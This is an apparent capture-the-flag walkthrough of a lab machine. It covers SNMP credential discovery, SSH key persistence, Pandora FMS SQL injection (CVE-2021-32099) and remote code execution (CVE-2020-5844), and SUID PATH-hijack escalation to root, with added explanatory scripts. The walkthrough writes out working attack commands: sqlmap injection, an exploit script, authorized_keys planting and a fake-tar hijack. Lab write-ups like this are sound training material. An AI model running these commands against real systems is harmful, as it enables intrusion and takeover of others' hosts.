- The first step is to scan all TCP ports, then enumerate the versions and technologies running on the open ones.
nmap -p- --open -vvv --min-rate 3000 -Pn -sS 10.10.11.136 -oG scan
/opt/extractports scan
nmap -p22,80 -Pn -sCV 10.10.11.136 -oN ports
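The /opt/extractports helper used above is a personal script whose source is not shown on this page. As an added example (my code, not the page's script), here is a POSIX sh equivalent: it pulls the open ports out of the grepable (-oG) output and joins them into the comma-separated list that the follow-up nmap -p command expects. The scan file it reads is constructed for the demo, not the page's real scan file.

```shell
#!/bin/sh
# Added example, not the page's /opt/extractports (whose source is not shown).
# Extract the open ports from an nmap grepable (-oG) file as a comma-separated list.

extract_ports() {
    # $1 = path to the -oG file. The Ports field looks like
    #   Ports: 22/open/tcp//ssh///, 80/open/tcp//http///
    # so every "<port>/open/" token is an open port. Sort numerically,
    # drop duplicates (a host can appear on several lines), join with commas.
    grep -o '[0-9][0-9]*/open/' "$1" \
        | cut -d/ -f1 \
        | sort -un \
        | tr '\n' ',' \
        | sed 's/,$//'
}

# Constructed sample of what "nmap -p- -oG scan" writes; not the page's scan file.
# A closed port is included to show that only /open/ entries are kept.
SCAN_SAMPLE=$(mktemp)
cat > "$SCAN_SAMPLE" <<'EOF'
# Nmap 7.92 scan initiated as: nmap -p- --open -Pn -sS 10.10.11.136 -oG scan
Host: 10.10.11.136 ()   Status: Up
Host: 10.10.11.136 ()   Ports: 80/open/tcp//http///, 22/open/tcp//ssh///, 443/closed/tcp//https///   Ignored State: closed (65532)
# Nmap done -- 1 IP address (1 host up) scanned
EOF

OPEN_PORTS=$(extract_ports "$SCAN_SAMPLE")
echo "open ports: $OPEN_PORTS"                                    # open ports: 22,80
echo "next: nmap -p$OPEN_PORTS -Pn -sCV 10.10.11.136 -oN ports"
```

The first scan deliberately skips version detection (-sS with a high --min-rate) so the full 65535-port sweep stays fast; the -sCV pass is then run only against the handful of ports this function returns.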

- I find the domain panda.htb and add it to my hosts file (/etc/hosts).
- After browsing the website I find nothing relevant, so I turn to UDP enumeration, which surfaces SNMP (161/udp).
- First, I brute-force the SNMP community strings with onesixtyone.
onesixtyone -c /usr/share/wordlists/seclists/Discovery/SNMP/snmp.txt 10.10.11.136
- With a valid community string (public), I walk the MIB tree and find credentials in the output.
snmpwalk -v2c -c public 10.10.11.136
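A snmpwalk with no OID walks mib-2, which includes HOST-RESOURCES-MIB: hrSWRunName (.1.3.6.1.2.1.25.4.2.1.2) and hrSWRunParameters (.1.3.6.1.2.1.25.4.2.1.5) list every running process and its full command line, which is where credentials passed as program arguments end up. The page does not say which OID the credentials came from; that they sat in a process command line is an assumption of this added example (my code, not the author's), which sifts saved snmpwalk output for argument strings that look like credentials. The walk output below is constructed, including the process names and the password.

```shell
#!/bin/sh
# Added example: hunt for credentials in saved snmpwalk output. Assumes (the page
# does not say) that they were passed on a process command line, which SNMP
# exposes through hrSWRunParameters (.1.3.6.1.2.1.25.4.2.1.5).

snmp_cred_hunt() {
    # $1 = file holding snmpwalk output. Match both the MIB-resolved form
    # (HOST-RESOURCES-MIB::hrSWRunParameters.N) and the raw numeric form
    # (iso.3.6.1.2.1.25.4.2.1.5.N) printed when no MIBs are installed, then
    # keep the lines whose value carries a password-like argument.
    grep -E 'hrSWRunParameters|\.25\.4\.2\.1\.5\.' "$1" \
        | grep -Ei -- '(^|[[:space:]"])-p[[:space:]]*[^[:space:]"-]|pass|pwd=|secret|token'
}

# Constructed sample; process names, PIDs and the password are made up.
SNMP_SAMPLE=$(mktemp)
cat > "$SNMP_SAMPLE" <<'EOF'
HOST-RESOURCES-MIB::hrSWRunName.1 = STRING: "systemd"
HOST-RESOURCES-MIB::hrSWRunParameters.1 = STRING: "--system --deserialize 21"
HOST-RESOURCES-MIB::hrSWRunName.900 = STRING: "sshd"
HOST-RESOURCES-MIB::hrSWRunParameters.900 = STRING: "-D"
HOST-RESOURCES-MIB::hrSWRunName.1104 = STRING: "bash"
HOST-RESOURCES-MIB::hrSWRunParameters.1104 = STRING: "/usr/local/bin/svc_check -u svc -p Constructed_Pa55"
HOST-RESOURCES-MIB::hrSWRunName.2210 = STRING: "apache2"
HOST-RESOURCES-MIB::hrSWRunParameters.2210 = STRING: "-k start"
EOF

snmp_cred_hunt "$SNMP_SAMPLE"   # prints only the svc_check line
```

A full walk of a busy host is slow and noisy; once the community string is known, walking just the process table (`snmpwalk -v2c -c public 10.10.11.136 1.3.6.1.2.1.25.4.2.1.5`) returns the command lines directly. The pattern is a hunting heuristic, so expect some false positives (any `-p <value>` argument matches) and read the hits by hand.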

- I validate the credentials over SSH and get access to the system.

- For convenience when connecting, I generate an SSH key pair and add the public key to daniel's authorized_keys so I can log in with the key. Note that sshd (with StrictModes, on by default) rejects the key if ~/.ssh is not mode 700 or authorized_keys is group/world-writable, so fix the permissions if the directory had to be created.
ssh-keygen -f key
cat key.pub
echo "ssh-rsa AAAAB...SNIP...M= user@parrot" >> /home/daniel/.ssh/authorized_keys
ssh -i key daniel@10.10.11.136
- I see that the first flag is only readable by the user matt.
- While looking for a way to move laterally to matt, I find a website that was not reachable from outside. I forward port 80 to my machine over SSH to view it.

- After pointing pandora.panda.htb in my hosts file at 127.0.0.1 (the forwarded port listens on loopback), I see a Pandora FMS console, version v7.0NG.742_FIX_PERL2020. Searching for this version turns up several vulnerabilities.
ssh -L 8089:localhost:80 daniel@10.10.11.136

- The first is CVE-2021-32099, an unauthenticated SQL injection through the session_id parameter of chart_generator.php. With it I dump the users registered in the database (the column list is is_admin,fullname; a dot between them would make sqlmap look for a non-existent column).
sqlmap -u 'http://pandora.panda.htb:8089/pandora_console/include/chart_generator.php?session_id=*' --batch -D pandora -T tusuario -C email,id_user,is_admin,fullname,password --dump

- I am unable to crack the password hashes. I continue enumerating the other tables and find one that holds the active sessions.
- All of them belong to daniel except one, which belongs to matt. Using that session together with another known vulnerability in this version (CVE-2020-5844, an authenticated remote code execution) lets me execute commands on the system as matt. I use this repository to get an interactive shell:
python3 sqlpwn.py -t pandora.panda.htb:8089
- With a shell as matt, I read the first flag of the system.
- Then I upgrade the TTY, because the current shell does not let me run some commands such as sudo -l. I also add my SSH key following the same steps as before.
script /dev/null -c bash
Ctrl + z
stty raw -echo; fg
reset xterm
export SHELL=bash
export TERM=xterm
stty rows 50 columns 116
- For privilege escalation I start by listing the SUID binaries and find one that is not standard: /usr/bin/pandora_backup

- I copy the binary to my machine and look at its strings. It invokes tar by a bare name rather than an absolute path, so the command is resolved through PATH, which the caller controls: we can plant a fake tar that the SUID binary will execute with its elevated privileges.

- I create an executable named tar containing the command I want to run, prepend its directory to PATH, and execute pandora_backup. This way I become root and can read the second flag of the system.
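To see the mechanism in isolation, here is an added example (my code, not the page's pandora_backup, whose exact command line is not shown, nor the author's payload). It models the SUID binary as a shell call that invokes tar by bare name, plants a fake tar in an attacker-controlled directory prepended to PATH, and shows the hardened variant alongside: a trusted PATH that the caller cannot influence. It runs without root and only demonstrates the lookup.

```shell
#!/bin/sh
# Added example: PATH hijack of a program that invokes "tar" by bare name.
# Stand-in for the page's pandora_backup; its real command line is not shown.

plant_fake_tar() {
    # Create an attacker-controlled directory holding an executable named tar.
    # A real payload would copy /bin/bash and chmod 4755 it, or run "bash -p";
    # here it only announces itself so the demo is safe to run.
    dir=$(mktemp -d)
    printf '#!/bin/sh\necho HIJACKED\n' > "$dir/tar"
    chmod 755 "$dir/tar"
    echo "$dir"
}

vulnerable_backup() {
    # Models system("tar ...") inside the SUID binary: /bin/sh -c resolves a
    # bare command name through the caller's PATH, so the fake tar wins.
    sh -c 'tar --version 2>/dev/null | head -n 1'
}

hardened_backup() {
    # Fix: reset PATH to a trusted value before the lookup (a real SUID binary
    # should also call tar by absolute path with execve rather than system()).
    sh -c 'PATH=/usr/bin:/bin; export PATH
           { tar --version 2>/dev/null || echo "real tar not found"; } | head -n 1'
}

ATTACKER_DIR=$(plant_fake_tar)
PATH="$ATTACKER_DIR:$PATH"
export PATH

echo "vulnerable: $(vulnerable_backup)"   # vulnerable: HIJACKED
echo "hardened:   $(hardened_backup)"     # the real tar's version line, never HIJACKED
```

Two things trip this up in practice: the planted file must be executable, and if the payload is a bash script, bash drops an effective UID that differs from the real UID unless it is started with -p, so either invoke bash -p or have the payload set the SUID bit on a copy of a shell. The hijack also only works because the binary neither sanitises PATH nor uses an absolute path; either fix on its own closes it.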
